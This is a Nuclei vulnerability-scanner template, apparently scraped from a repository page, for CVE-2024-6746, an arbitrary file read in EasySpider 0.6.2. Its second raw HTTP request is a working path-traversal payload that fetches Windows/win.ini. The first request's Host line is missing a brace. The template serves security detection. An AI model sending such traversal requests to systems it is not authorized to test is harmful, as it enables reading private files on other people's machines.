nuclei-templates/http/cves/2024/CVE-2024-6746.yaml

56 lines
1.9 KiB
YAML
Raw Normal View History

2024-07-16 23:16:51 +00:00
id: CVE-2024-6746
info:
name: EasySpider 0.6.2 - Arbitrary File Read
author: securityforeveryone
severity: medium
description: |
A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
reference:
- https://github.com/NaiboWang/EasySpider/issues/466
- https://cvefeed.io/vuln/detail/CVE-2024-6746
- https://vuldb.com/?id.271477
- https://vuldb.com/?submit.371998
- https://vuldb.com/?ctiid.271477
- https://github.com/NaiboWang/EasySpider
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-6746
cwe-id: CWE-24
epss-score: 0.00045
epss-percentile: 0.1594
metadata:
2024-07-17 05:39:21 +00:00
vendor: naibowang
product: easyspider
2024-07-16 23:16:51 +00:00
tags: cve,cve2024,lfi,network
flow: http(1) && http(2)
http:
- raw:
- |
GET /taskGrid/tasklist.html HTTP/1.1
Host: {{Hostname}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>任务列表 | Task List</title>")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /../../../../../../../../../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100ab7c302013c663282ee437e7ce5cfa592e11d90859c17e5c5c31c26d09835df90220639425815d849a66a4d04b48ddf1f1e6d9e2fc6192ad6a31b20dc25ba8a1e81b:922c64590222798bb761d5b6d8e72950